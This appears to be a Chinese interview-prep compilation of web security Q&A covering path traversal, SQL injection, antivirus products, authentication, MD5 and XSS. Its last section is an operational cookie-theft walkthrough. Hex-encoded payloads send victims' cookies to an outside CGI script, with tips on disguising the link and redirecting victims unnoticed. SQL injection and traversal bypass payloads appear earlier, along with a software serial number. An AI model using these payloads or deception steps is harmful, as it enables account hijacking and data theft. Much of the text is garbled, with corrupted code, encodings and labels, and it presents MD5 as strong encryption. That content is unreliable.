资源描述
IT面试笔试题全集_史上最全_网络安全篇_Rain系列介绍一下如何利用路径遍历进行攻击及如何防范?_追雨制作 如果应用程序使用用户可控制的数据,以危险的方式访问位于应用服务器或其它后端文件系统的文件或目录,就会出现路径遍历Sing rurl = request.getParameter(“rurl”);BufferedWriter utput2 = new BufferedWriter(new FileWriter(new File(“/home/chenyz/”+rurl);攻击者可以将路径遍历序列放入文件名内,向上回溯,从而访问服务器上的任何文件,路径遍历序列叫“点-点-斜线”(.)http:/*/go.action?file=.etcpasswd避开过滤第一种是过滤文件名参数中是否存在任何路径遍历序列(.)如果程序尝试删除(.)来净化用户输入,可以用#8230;./ #8230;./ #8230;./ #8230;.进行URL编码点%2e 反斜杠%2f 正斜杠%5c进行16为Unicode编码点%u002e 反斜杠%u2215 正斜杠%u2216进行双倍URL编码点%252e 反斜杠%u252f 正斜杠%u255c进行超长UTF-8 Unicode编码点%c0%2e %e0$40%ae %c0ae反斜杠%c0af %e0%80af %c0%af正斜杠%c0%5c %c0%80%5c预防路径遍历的方法:1.对用户提交的文件名进行相关解码与规范化2.程序使用一个硬编码,被允许访问的文件类型列表3.使用getCanonicalPath方法检查访问的文件是否位于应用程序指定的起始位置 SQL注入攻击的种类有哪些?_追雨制作 1.没有正确过滤转义字符SELECT * FROM users WHERE name = #8216; + userName + #8220;#8216;SELECT * FROM users WHERE name = #8216;a#8217; OR #8216;t#8217;=t#8217;2.错误的类型处理SELECT * FROM data WHERE id = + a_variable + #8220;SELECT * FROM DATA WHERE id = 1; DROP TABLE users;3.数据库服务器中的漏洞MYSQL服务器中mysql_real_escape_sing()函数漏洞,允许一个攻击者根据错误的统一字符编码执行成功的SQL注入式攻击4.盲目SQL注入式攻击Absinthe的工具就可以使这种攻击自动化5.条件响应6.条件性差错7.时间延误 渗透攻击的测试步骤_追雨制作 1.如果原始值为2,我们使用(1+1)或(3-1),程序作出相同回应,表明易受攻击2.如果单引号被过滤掉,我们可以用ASCII命令,使它返回字符的数字化代码,如51-ASCII(1)3.在URL编码中,amp;和=用于链接名称/值对,建立查询字符串应当分别使用%26和%3d进行编码4.如查询字符串不允许使用空格,使用+或%20编码5.分号被用于分割cookie自读,使用%3d编码 防御和检查SQL注入的主要手段有哪些?_追雨制作 1.在代码中使用参数化的过滤性语句2.避免使用解释程序3.防范SQL注入,对应用程序的异常进行包装处理,避免出现一些详细的错误消息4.使用专业的漏洞扫描工具对服务器和应用程序进行安全扫描。5.在Web应用程序开发过程的所有阶段实施代码的安全检查 常见的Web漏洞有哪些?_追雨制作 1. 用户验证漏洞:没有正确的对用户进行验证2. 用户凭证管理问题:没有正确的对用户凭证进行创建,保存,传输和保护,用户凭证包括用户密码等3. 权限,特权以及访问控制漏洞4. 缓存漏洞5. 跨站脚本漏洞6. 加密漏洞7. 路径切换漏洞,用户输入可以包含.等字符来对应用程序路径进行切换和读取8. 代码注入漏洞9. 配置漏洞10. 数据泄漏和信息11. 输入验证漏洞12. 操作系统命令脚本注入13. 资源管理漏洞:允许用户操作过多的服务器资源,比如CPU,内存等等14. SQL注入15. 链接跟踪:允许用户直接用链接访问或者下载用户不该访问的文件 什么叫做SQL注入,如何防止?请举例说明。_追雨制作 利用sql关键字对网站进行攻击。过滤关键字#8217;等所谓SQL注入(SQL Injection),就是利用程序员对用户输入数据的合法性检测不严或不检测的特点,故意从客户端提交特殊的代码,从而收集程序及服务器的信息,从而获取想得到的资料。http:/localhost/lawjia/show.asp?ID=444 and user0,这时,服务器运行Select * from 表名 where 字段=444 and user0这样的查询,当然,这个语句是运行不下去的,肯定出错,错误信息如下:错误类型:Microsoft OLE DB Provider for ODBC Drivers (0#215;80040E07)MicrosoftODBC SQL Server DriverSQL Server将 nvarchar 值 #8217;sonybb#8217; 转换为数据类型为 int 的列时发生语法错误。 请介绍一下常见的网络安全防护软件的性能_追雨制作 金山毒霸20051、特别推荐主动实时升级:无需用户做任何操作,当有最新的病毒库或者功能出现时,金山毒霸可将此更新自动下载安装。此功能保证您在任何时刻都可以获得与全球同步的最新病毒特征库,防止被新病毒破坏感染,即使面对“冲击波”这样快速传播的病毒,金山毒霸2005也能极大程度的遏制病毒入侵用户计算机!抢先启动防毒系统:防毒胜于杀毒,抢先启动的防毒系统可保障在Windows未完全启动时就开始保护用户的计算机系统,早于一切开机自运行的病毒程序,使用户避免“带毒杀毒”的危险。抢先式防毒让您的安全更早一步。2、经典奉献主动漏洞修复:可扫描操作系统及各种应用软件的漏洞,当新的安全漏洞出现时,金山毒霸会下载漏洞信息和补丁,经扫描程序检查后自动帮助用户修补。此功能可确保用户的操作系统随时保持最安全状态,避免利用该漏洞的病毒侵入系统。另外还会扫描系统中存在的诸如简单密码、完全共享文件夹等安全隐患。跟踪式反间谍:采用全新的网络程序校验策略。除了传统反黑、拦截木马等功能外,同时对普通应用程序进行跟踪监控。一旦应用程序的大小、内容等属性发生异常变化,系统将特别提醒用户注意,有效防止止木马、间谍软件“冒名顶替”盗取用户数据。木马防火墙:通过多种技术,实现对木马进程的查杀。系统中一旦有木马、黑客或间谍程序访问网络,会及时拦截该程序对外的通信访问,然后对内存中的进程进行自动查杀,保护用户网络通信的安全。这对防御盗取用户信息的木马、黑客程序特别有效。星杀毒软件网络版是一款应用于复杂网络结构的企业级反病毒产品,该产品专门为企业用户量身定做,使企业轻松构建安全的立体防毒体系。该产品主要适用于企业服务器与客户端,支持 WindowsNT/2000/XP、Unix、Linux等多种操作平台,全面满足企业整体反病毒需要。瑞星杀毒软件网络版创立并实现了“分布处理、集中控制”技术,以系统中心、服务器、客户端、控制台为核心结构,成功地实现了远程自动安装、远程集中控管、远程病毒报警、远程卸载、远程配置、智能升级、全网查杀、日志管理、病毒溯源等功能,它将网络中的所有计算机有机地联系在一起,构筑成协调一致的立体防毒体系。瑞星杀毒软件网络版采用目前国际上最先进的结构化多层可扩展(SME)技术设计研制的第五代引擎,实现了从预杀式无毒安装、漏洞扫描、特征码判断查杀已知病毒,到利用瑞星专利技术行为判断查杀未知病毒,并通过可疑文件上报系统、嵌入式即时安全信息中心与瑞星中央病毒判别中心构成的信息交互平台,改被动查杀为主动防御,为网络中的个体计算机提供点到点的立体防护江民杀毒KV2005 9.00.504(2005.1.13)软件语言:简体中文授权方式:零售版软件类别:病毒防治运行环境:Win9x/WinNT/2000/ME/XP采用先进的“驱动级编程技术”,能够与操作系统底层技术更紧密结合,具有更好的兼容性,占用系统资源更小。 KV2005突出特点是独创的“系统级深度防护技术”与操作系统互动防毒,彻底改变以往杀毒软件独立于操作系统和防火墙的单一应用模式,开创杀毒软件系统级病毒防护新纪元。据悉,江民对微软的XP SP2安全中心进行了延伸和拓展,在此基础上开发了KV安全中心,不但可以在XP操作系统上应用,WIN98、WIN2000用户同样可以拥有安全中心。同时,KV2005采用了先进的“立体联动防杀技术”,即杀毒软件与防火墙联动防毒、同步升级,对于防范集蠕虫、木马、后门程序等特性于一体的混合型病毒更有效卡巴斯基(Kaspersky Internet Security) 2006 6.0.9.96 汉化版软件大小:9005K软件语言:简体中文授权方式:免费版软件类别:病毒防治运行环境:Win9x/WinNT/2000/ME/XP软件介绍:Kaspersky 为任何形式的个体和社团提供了一个广泛的抗病毒解决方案。它提供了所有类型的抗病毒防护:抗病毒扫描仪,监控器,行为阻段和完全检验。它支持几乎是所有的普通操作系统、e-mail 通路和防火墙。Kaspersky控制所有可能的病毒进入端口,它强大的功能和局部灵活性以及网络管理工具为自动信息搜索、中央安装和病毒防护控制提供最大的便利和最少的时间来建构你的抗病毒分离墙。这是最新的 Kaspersky 安全套装,包括了反病毒、反黑客、反间谍、反垃圾邮件、前摄防御等全套安全工具,可让你的系统高枕无忧。此版是第一个原型测试版,某些功能尚在开发中,估计 BUG较多,请谨慎使用。汉化注意事项:1、请先安装原英文软件。2、建议汉化前退出 KAV 应用程序,包括系统栏图标!3、运行汉化包中的汉化补丁,按正确的安装目录进行汉化(汉化会自动查找安装目录)。必要时请重启动电脑。4、再次启动 Kaspersky 即是中文界面。5、此次汉化是另加的中文语言包,并保留原英文和俄文的语言。6、在反黑客的设置中,因原程序原因,规则配置一栏不能汉化,否则在规则描述中原来可修改的值的顺序会被打乱。只有等下一版官方解决了这个问题才行。Norton2005 安全特警简体中文正式版(含防火墙)软件语言: 简体中文软件类型: 国外软件 / 免费版运行环境: Win9X/Me/WinNT/2000/XP授权方式: 正式版软件大小: 174.25MB有力防护病毒、蠕虫和特洛伊木马程序诺顿防病毒软件2005包含新的互联网蠕虫防护,保护个人和家庭工作室用户不受迅速传播的新型混合互联网蠕虫的攻击,即使这些病毒可以通过多个入口攻击计算机用户的系统。将蠕虫阻止技术应用到下一层,互联网蠕虫防护可以阻止联网端口以防止诸?quot;震荡波,MyDoom和冲击波威胁的传播,而这些病毒通常通过传统的防病毒解决方案防护不到的系统漏洞,进行自身传播。诺顿防病毒软件2005将继续提供可靠的自动服务,无需用户干预,就可以扫描和清除病毒、蠕虫和特洛伊木马程序。诺顿防病毒软件2005还包含间谍软件检测功能,抵御用户计算机上那些被用来恶意泄漏系统安全、监视用户隐私数据或跟踪用户联机行为的程序。对黑客和隐私窃贼的必要防护诺顿个人防火墙2005采用了新的机密信息阻止工具,提供增强的隐私控制,因此可以直接保护用户隐私免遭侵害,甚或是最微小的干扰。新特性支持用户不中断地发送机密信息到他们信任的网站;当用户发送个人数据到不可信任的网站时,则发出警告。机密信息阻止技术有助于防止用户成为网页仿冒的牺牲品。网页仿冒是一种欺诈,它引诱互联网用户向有害并具有潜在威胁的网站提供机密的个人信息,从而导致用户身份被窃。赛门铁克强健的入侵防护技术是诺顿个人防火墙2005的另一个关键配置。它提供重要的附加安全层,可以结合软件的防火墙,从而预先识别潜在的攻击。这一附加防护层支持诺顿个人防火墙2005仔细监测实际互联网流量,以便有效地识别和阻止联网攻击的尝试。这些,是一个基本的没有入侵防护的防火墙所无法做到的。全面的电子邮件过滤解决方案由于垃圾邮件持续激增,并日益成为一种安全威胁,赛门铁克最新的增强型诺顿反垃圾邮件2005将提供更强的过滤能力来解决电子邮件用户最常见的担心。诺顿反垃圾邮件2005将对某些形式的电子邮件欺诈提供更多的保护,它识别在电子邮件消息内的欺诈的URL互联网地址,并过滤这些信息中的欺骗性的、虚假的发送方地址。用户还可以选择过滤色情垃圾邮件,这样,不想要的内容永远不会抵达收件箱。他们也可以使用诺顿反垃圾邮件2005中基于语言的新型过滤器来阻止特定语言的电子邮件信息。诺顿反垃圾邮件2005将持续发挥作用,在大多数pop3连接中自动拦截和分析电子邮件,并在抵达用户收件箱时识别垃圾邮件。诺顿反垃圾邮件2005将紧密地和最新版本的微软Outlook,Outlook Express、Eudora以及Yahoo! Web email集成在一起,自动创建一个垃圾邮件目录来收集所有检测出的垃圾邮件。诺顿反垃圾邮件2005甚至将在微软Outlook接受Hotmail和MSN邮件时过滤垃圾邮件。这样,用户不仅节省了时间,还可以不受垃圾邮件可能包含的误导信息和不宜内容的干扰。最完整的多合一安全和隐私保护套件将诺顿防病毒软件2005、诺顿个人防火墙2005和诺顿反垃圾邮件2005无缝集成到一个软件套件后,诺顿网络安全特警2005将提供完整、自动的保护,可以针对最复杂的互联网威胁提供保护。诺顿网络安全特警2005还包含新的爆发警报,为用户带来附加好处当威胁级别高的病毒爆发时,用户将自动接收到警报信息。爆发警报将分析用户PC机的安全状态,必要时立刻提供推荐方案强化防护。此外,诺顿网络安全特警2005将通过简单易用的网页内容过滤功能,能够使孩子和家庭不受少儿不宜或色情网站的影响。安装序列号:BBC2-YGJP-X4B9-PBCM-VH6G-DYKD天网防火墙个人版是个人电脑使用的网络安全程序,根据管理者设定的安全规则把守网络,提供强大的访问控制、信息过滤等功能,帮你抵挡网络入侵和攻击,防止信息泄露。天网防火墙把网络分为本地网和互联网,可针对来自不同网络的信息,来设置不同的安全方案,适合于任何方式上网的用户。1)严密的实时监控天网防火墙(个人版)对所有来自外部机器的访问请求进行过滤,发现非授权的访问请求后立即拒绝,随时保护用户系统的信息安全。2)灵活的安全规则天网防火墙(个人版)设置了一系列安全规则,允许特定主机的相应服务,拒绝其它主机的访问要求。用户还可以根据自已的实际情况,添加、删除、修改安全规则,保护本机安全。3)应用程序规则设置新版的天网防火墙增加对应用程序数据包进行底层分析拦截功能,它可以控制应用程序发送和接收数据包的类型、通讯端口,并且决定拦截还是通过,这是目前其它很多软件防火墙不具有的功能。4)详细的访问记录和完善的报警系统天网防火墙(个人版)可显示所有被拦截的访问记录,包括访问的时间、来源、类型、代码等都详细地记录下来,你可以清楚地看到是否有入侵者想连接到你的机器,从而制定更有效的防护规则。与以往的版本相比,天网防火墙(个人版)设置了完善的声音报警系统,当出现异常情况的时候,系统会发出预警信号,从而让用户作好防御措施。方正熊猫入侵防护个人版(TruPrevent) 2005文件大小:17.71M运行平台:Windows9X/ME/NT/2000/XP方正熊猫入侵防护个人版2005(即TruPrevent)是方正安全公司联手欧洲熊猫软件为2005年推出的一款新品。产品基于“专门针对未知病毒和攻击而设计”的智能识别技术,即是通过采用“行为分析技术”鉴别文件是否具有危险性或攻击性,即使那些诸如冲击波、振荡波之流的未知病毒亦能够有效隔离。该技术改变了传统杀毒软件所使用的“响应式”技术(被动查杀),转而通过对程序行为的主动跟踪和分析,从而判断是否为病毒或攻击并对之相应做出防范措施。该产品面向家庭用户和SOHU用户,是针对个人PC的一款预防性安全解决方案。朝华安博士(VirusClean)是朝华软件应用服务有限公司与韩国安博士有限公司联合开发的针对Win 9X/Me/2000 Professional /XP 客户端专用的计算机杀毒软件。与国内外众多杀毒软件相比,VirusClean 不仅提供最快而最强有力的病毒查/杀功能,而且还可以监控、检测并修复互联网上收到的各种数据及文件中的病毒。VirusClean内置了具有国际离领先技术的WARP 防病毒引擎,因此误报率的可能性极少,而且具有出色的文件恢复功能。所获奖项:计算机世界获“2003年中国信息安全优秀解决方案”软件世界获“2003年中国电子政务十佳防病毒解决方案”中国计算机报与“趋势”一起获得“2003年值得信赖防病毒品牌”中国软件评测中心以杀毒最快、资源占用最少获最高15颗星的“技术创新东方卫士2005(完整功能)下载版最先支持WindowsXP推出的SP2服务包,与SP2的安全中心进行了防毒认证,是最先获得微软认证的防毒软件之一。能够和WindowsXP SP2安全中心状态形成互动,及时提醒防毒软件是否过期。东方卫士2005(完整功能)下载版不仅延续了“一防、二杀、三恢复”的防毒理念,在防毒功能和特色功能上作了深入改进,真正做到了安全、稳定、易用!东方卫士2005(完整功能)下载版防毒产品是完整功能版,而且便于下载(5.81MB)。目前免费使用,免费升级!冰盾防火墙是全球第一款具备IDS入侵检测功能的专业级抗DDOS防火墙,来自IT技术世界一流的美国硅谷,由华人留学生Mr.Bingle Wang和Mr.Buick Zhang设计开发,采用国际领先的生物基因鉴别技术智能识别各种DDOS攻击和黑客入侵行为,防火墙采用微内核技术实现,工作在系统的最底层,充分发挥CPU的效能,仅耗费少许内存即获得惊人的处理效能。经高强度攻防试验测试表明:在抗DDOS攻击方面,工作于100M网卡冰盾约可抵御每秒25万个SYN包攻击,工作于1000M网卡冰盾约可抵御160万个SYN攻击包;在防黑客入侵方面,冰盾可智能识别Port扫描、Unicode恶意编码、SQL注入攻击、Trojan木马上传、Exploit漏洞利用等2000多种黑客入侵行为并自动阻止。冰盾防火墙的主要防护功能如下: 阻止DOS攻击:TearDrop、Land、Jolt、IGMP Nuker、Boink、Smurf、Bonk、BigPing、OOB等数百种。 抵御DDOS攻击:SYN/ACK Flood、UDPFlood、ICMP Flood、TCP Flood等所有流行的DDOS攻击。 拒绝TCP全连接攻击:自动阻断某一IP对服务器特定端口的大量TCP全连接资源耗尽攻击。 防止脚本攻击:专业防范ASP、PHP、PERL、JSP等脚本程序的洪水式Flood调用导致数据库和WEB崩溃的拒绝服务攻击。 对付DDOS工具:XDOS、HGOD、SYNKILLER、CC、GZDOS、PKDOS、JDOS、KKDOS、SUPERDDOS、FATBOY、SYNKFW等数十种。 超强Web过滤:过滤URL关键字、Unicode恶意编码、脚本木马、防止木马上传等。 侦测黑客入侵:智能检测Port扫描、SQL注入、密码猜测、Exploit利用等2000多种黑客入侵行为并阻断全球最畅销的杀毒软件之一,McAfee防毒软件, 除了操作介面更新外,也将该公司的WebScanX功能合在一起,增加了许多新功能! 除了帮你侦测和清除病毒,它还有VShield自动监视系统,会常驻在System Tray,当你从磁盘、网络上、E-mail夹文件中开启文件时便会自动侦测文件的安全性,若文件内含病毒,便会立即警告,并作适当的处理,而且支持鼠标右键的快速选单功能,并可使用密码将个人的设定锁住让别人无法乱改你的设定。木马分析专家能自动分析、终止可疑进程、窗体类型及木马详细资料(如创建时间,文件大小,分析 Config.sys、Autoexec.bat、Winstart.bat、System.ini、Win.ini、注册表Load键值等),并能随时在线升级木马病毒代码特征库,100%查杀各种未知木马。另外,木马分析专家个人防火墙为您的计算机提供全面的保护,有效地监控任何网络连接。通过过滤不安全的服务,防火墙可以极大地提高网络安全,同时减小主机被攻击的风险。使系统具有抵抗外来非法入侵的能力,防止您的计算机和数据遭到破。2005最新功能有:新增显示与进程及窗体相关的所有详细信息:包括进程ID、优先级、包含的线程数、包含的模块数、进程文件大小、创建时间、访问时间、修改时间、文件的版本信息等。新增(IE/木马)个人防火墙,在线杀毒。最新版加强了对第五代木马的分析与查杀,能完美的查杀各种无进程,捆绑木马。木马分析专家不仅是查杀木马工具,更是一个安全分析审核工具,它提供了十余种安全审核功能,将许多安全审核工作集成于一身,可以帮助您迅速判断本机的安全状况,大大方便您的工作。防火墙新增对第2代反弹型木马的监控。现在有些木马以系统服务及Dll线程方式伪装插入IE或Explorer等正常进程中,使得这些病毒在正常模式下根本无法完全清除,因为你要杀死它之前必需先杀掉正常进程才行,但在安全模式下Windows只加载系统本身的模块,这时木马病毒也就无处隐藏了,这也是许多杀毒软件建议在安全模式下进行查杀的主要原因。分析以上原理,我们创新出一种无需进入安全模式却有着与它同样或更好效果的【天下无马】查杀模式,该功能主要针对:正常模式下无法清除的已知、未知及杀之过后又来的恶性木马病毒。新增加入防止被木马病毒封杀功能,而且在清除病毒的同时,会自动清理DLL、OCX等木马控件在注册表中的捆绑信息木马防线2005是安天公司推出的一款面向个人用户的专业级反木马信息安全 产品,也是国内首款通过公安部权威检测的同类软件。该软件的英文版Antiy Ghostbusters于2001年在欧美地区发布,当年就成为全球AntiVirus TOP 50中唯一的上榜中国产品。并在全球木马查杀、反间谍工具排行中遥遥领先,获得多次海内外专业媒体盛誉 IBatis如何防范SQL 注入攻击?_追雨制作 风险:数据库资料被窃取,服务器被攻击者控制漏洞1 示例:在sqlmap中如下写法:select * from table where name like #8216;%$value$%#8217;UnSafeBean b = (UnSafeBean)sqlMap.queryForObject(value, request.getParameter(name);漏洞1 说明:其中sqlmap方式是把$*$ 替换,假设用户输入 #8216;drop table admin那么翻译为本地SQL为select * from table where name like #8216;%#8217;drop table admin%#8217;修补方法:采用 #*# 的方式 sqlmap是采用 预编译方式处理把转义操作交给数据库本身!select * from table where name like #8216;%#8217;|#value#|#8217;%#8217;漏洞2 示例:$OrderId$ $sortSeq$Sing orderId = group.getField(orderId).getSingValue();query.setOrderId(SingUtils.isNotBlank(orderId)?orderId:null);PaginationQueryList pageList =orderService.listCustomerOrderForMistinessQuery(query);漏洞2 说明:其中sqlmap方式是把$*$ 替换,假设用户输入 a;drop table admin那么翻译为本地SQL为select * from PRIVATE_SHOWROOM_PRODUCT order by a;drop table admin修补方法:$OrderId:METADATA$ $sortSeq:SQLKEYWORD$ 什么是网络安全中的双因素认证?_追雨制作 双因素是密码学的一个概念,从理论上来说,身份认证有三个要素:第一个要素(所知道的内容):需要使用者记忆的身份认证内容,例如密码和身份证号码等。第二个要素(所拥有的物品):使用者拥有的特殊认证加强机制,例如动态密码卡(令牌),IC卡,磁卡等。第三个要素(所具备的特征):使用者本身拥有的惟一特征,例如指纹、瞳孔、声音等。单独来看,这三个要素中的任何一个都有问题。“所拥有的物品”可以被盗走;“所知道的内容”可以被猜出、被分享,复杂的内容可能会忘记;“所具备的特 征”最为强大,但是代价昂贵且拥有者本身易受攻击,一般用在顶级安全需求中。把前两种要素结合起来的身份认证的方法就是“双因素认证”。双因素认证和利用自动柜员机提款相似:使用者必须利用提款卡(认证设备),再输入个人识别号码(已知信息),才能提取其账户的款项。 由于需要用户身份的双重认证,双因素认证技术可抵御非法访问者,提高认证的可靠性。简而言之,该技术降低了电子商务的两大风险:来自外部非法访问者的身份欺诈和来自内部的更隐蔽的网络侵犯。 你了解动态密码技术么? 请简单介绍一下_追雨制作 动态密码(Dynamic Password)也叫做一次性密码,它是指用户密码按照时间或使用次数不断变化,每个密码只能使用一次或者只能在一个短时间内使用。动态密码技术采用一种动态令牌的专用硬件,内置电源、密码生成芯片和显示屏. 其中数字键用来输入用户PIN码,显示屏用于显示一次性密码。每次用户输入正确的PIN码时,都可以得到一个当前可用的一次性动态密码。动态令牌的密码生成芯片运行专门的密码算法,它当前时间以及使用次数生成当前密码并显示在显示屏上。认证服务器采用相同的算法计算当前的有效密码。由于每次使用的密码必须由动态令牌来产生,只有合法用户才持有该硬件,所以只要密码验证通过,系统就可以认为该用户的身份是可靠的。而用户每次使用的密码都不相同,即使黑客截获了一次密码,也无法利用这个密码来仿冒合法用户的身份,因为下一次登录必须使用另外一个动态密码。 介绍一下MD5加密算法_追雨制作 MD5算法是一种非常优秀的加密算法。MD5加密算法特点:灵活性、不可恢复性。介绍MD5加密算法基本情况MD5的全称是Message-Digest Algorithm 5,在90年代初由MIT的计算机科学实验室和RSA Data Security Inc发明,经MD2、MD3和MD4发展而来。Message-Digest泛指字节串(Message)的Hash变换,就是把一个任意长度的字节串变换成一定长的大整数。请注意我使用了字节串而不是字符串这个词,是因为这种变换只与字节的值有关,与字符集或编码方式无关。MD5将任意长度的字节串变换成一个128bit的大整数,并且它是一个不可逆的字符串变换算法,换句话说就是,即使你看到源程序和算法描述,也无法将一个MD5的值变换回原始的字符串,从数学原理上说,是因为原始的字符串有无穷多个,这有点象不存在反函数的数学函数。MD5的典型应用是对一段Message(字节串)产生fingerprint(指纹),以防止被篡改。举个例子,你将一段话写在一个叫 readme.txt文件中,并对这个readme.txt产生一个MD5的值并记录在案,然后你可以传播这个文件给别人,别人如果修改了文件中的任何内容,你对这个文件重新计算MD5时就会发现。如果再有一个第三方的认证机构,用MD5还可以防止文件作者的抵赖,这就是所谓的数字签名应用。MD5还广泛用于加密和解密技术上,在很多操作系统中,用户的密码是以MD5值(或类似的其它算法)的方式保存的,用户Login的时候,系统是把用户输入的密码计算成MD5值,然后再去和系统中保存的MD5值进行比较,而系统并不知道用户的密码是什么。一些黑客破获这种密码的方法是一种被称为跑字典的方法。有两种方法得到字典,一种是日常搜集的用做密码的字符串表,另一种是用排列组合方法生成的,先用MD5程序计算出这些字典项的MD5值,然后再用目标的MD5值在这个字典中检索。即使假设密码的最大长度为8,同时密码只能是字母和数字,共26+26+10=62个字符,排列组合出的字典的项数则是 P(62,1)+P(62,2)#8230;.+P(62,8),那也已经是一个很天文的数字了,存储这个字典就需要TB级的磁盘组,而且这种方法还有一个前提,就是能获得目标账户的密码MD5值的情况下才可以。在很多电子商务和社区应用中,管理用户的Account是一种最常用的基本功能,尽管很多Application Server提供了这些基本组件,但很多应用开发者为了管理的更大的灵活性还是喜欢采用关系数据库来管理用户,懒惰的做法是用户的密码往往使用明文或简单的变换后直接保存在数据库中,因此这些用户的密码对软件开发者或系统管理员来说可以说毫无保密可言,本文的目的是介绍MD5的Java Bean的实现,同时给出用MD5来处理用户的Account密码的例子,这种方法使得管理员和程序设计者都无法看到用户的密码,尽管他们可以初始化它们。但重要的一点是对于用户密码设置习惯的保护。 XSS一些可能被问到的问题_追雨制作 XSS漏洞有多常见?由于XSS漏洞很容易在大型网站中发现,在黑客圈内它非常流行。FBI.gov、CNN.com、T、Ebay、 Yahoo、Apple、Microsoft、Zdnet、Wired、Newsbytes都有这样那样的XSS漏洞。在商业产品中,平均每个月能够发现10-25个XSS漏洞。加密能否防止XSS攻击?使用SSL(https)加密的网站并不比不加密的网站好到哪儿去。Web程序仍然以同样的方式工作,只是攻击是通过加密的连接实现。有些人看到浏览器上的锁图标就认为他们是安全的,其实不然。XSS漏洞能否在服务器上执行命令?XSS漏洞会导致Javascript的恶意插入,但它的执行受到很多限制。如果攻击者利用浏览器的漏洞,有可能在用户的计算机上执行命令。因此,就算能够执行命令也只能在客户端。简单地说,XSS漏洞可以触发客户端的其他漏洞。如果我不修改CSS/XSS漏洞会怎样?如果不修改XSS漏洞,你的网站上的用户会受到被篡改的威胁。许多大型网站都发现了XSS漏洞,这个问题已经得到普遍认识。如果不修改,发现它的人也许会警告你的公司,损害公司的信誉。你拒绝修改漏洞的消息也会传到客户那里,造成公司的信任危机。客户不信任的话还怎么做生意? 作为网站管理者应当如何防范XSS?_追雨制作 坚决不要相信任何用户输入并过滤所有特殊字符。这样既可消灭绝大部分的XSS攻击。另一个建议是输出页面时将 变换成 。要记住,XSS漏洞极具破坏性,一旦被利用,它会给你的事业带来极大的损害。攻击者会将这些漏洞公之于众,这会在用户隐私的问题上大大降低你的网站的用户信赖度。当然,仅仅将 ( 和 ) 变换成 是不够的,最好将 ( 和 ) 变换成 ( 和 ),# 和 amp; 变换成 # 和 amp;。 能否解释一下XSS cookie盗窃是什么意思?_追雨制作 根据作为攻击对象的Web程序,下面某些变量和插入位置可能需要进行调整。要注意这只是攻击方法的一个例子。在这个例子中,我们将利用脚本“a.php”中的 “viriable”变量中的跨站脚本漏洞,通过正常请求进行攻击。这是跨站脚本攻击最常见的形式。第一步: 锁定目标当你找到某个Web程序存在XSS漏洞之后,检查一下它是否设置了cookie。如果在该网站的任何地方设置了cookie,那么就可以从用户那里盗取它。第二步: 测试不同的攻击方式将产生不同的XSS漏洞,所以应适当进行测试以使得输出结果看起来像是正常的。某些恶意脚本插入之后会破坏输出的页面。(为欺骗用户,输出结果非常重要,因此攻击者有必要调整攻击代码使输出看起来正常。)下一步你需要在链接至包含XSS漏洞的页面的URL中插入 Javascript(或其他客户端脚本)。下面列出了一些经常用于测试XSS漏洞的链接。当用户点击这些链接时,用户的cookie奖被发送到 并被显示。如果你看到显示结果中包含了cookie信息,说明可能可以劫持该用户的账户。盗取Cookie的Javascript示例。使用方法如下。ASCII用法http:/host/a.php?variable=document.location=#8217; #8216;%20+document.cookie十六进制用法http:/host/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63% 75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e注意: 每种用法都先写为ASCII,再写成十六进制以便复制粘贴。1. #8220;document.location=#8217;#8217; +document.cookieHEX %22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27 %68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69 %2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f %6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e2. document.location=#8217;#8217; +document.cookieHEX %3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74 %70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e %2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c %2f%73%63%72%69%70%74%3e3. document.location=#8217;#8217; +document.cookieHEX %3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74 %74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69 %6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65 %3c%2f%73%63%72%69%70%74%3e第三步: 执行XSS将做好的URL通过电子邮件或其他方式发送出去。注意如果你直接将URL发送给其他人(通过电子邮件、即时通讯软件或其他方式),你应当将其进行十六进制编码,因为这些URL一眼便可看出包含恶意代码,但经过十六进制编码之后就可以欺骗大部分人。第四步: 处理收集到的信息一旦用户点击了你的URL,相应数据就会被发送到你的CGI脚本中。这样你就获得了 cookie信息,然后你可以利用Websleuth之类的工具来检查是否能盗取那个账户。在上面的例子中,我们仅仅将用户带到了 cookie.cgi页面上。如果你有时间,你可以在CGI中将用户重定向到原来的页面上,即可在用户不知不觉之中盗取信息。某些电子邮件程序在打开附件时会自动执行附件中的Javascript代码。即使像Hotmail这样的大型网站也是如此,不过它对附件内容作了许多过滤以避免cookie被盗。 什么是跨站脚本攻击?_追雨制作 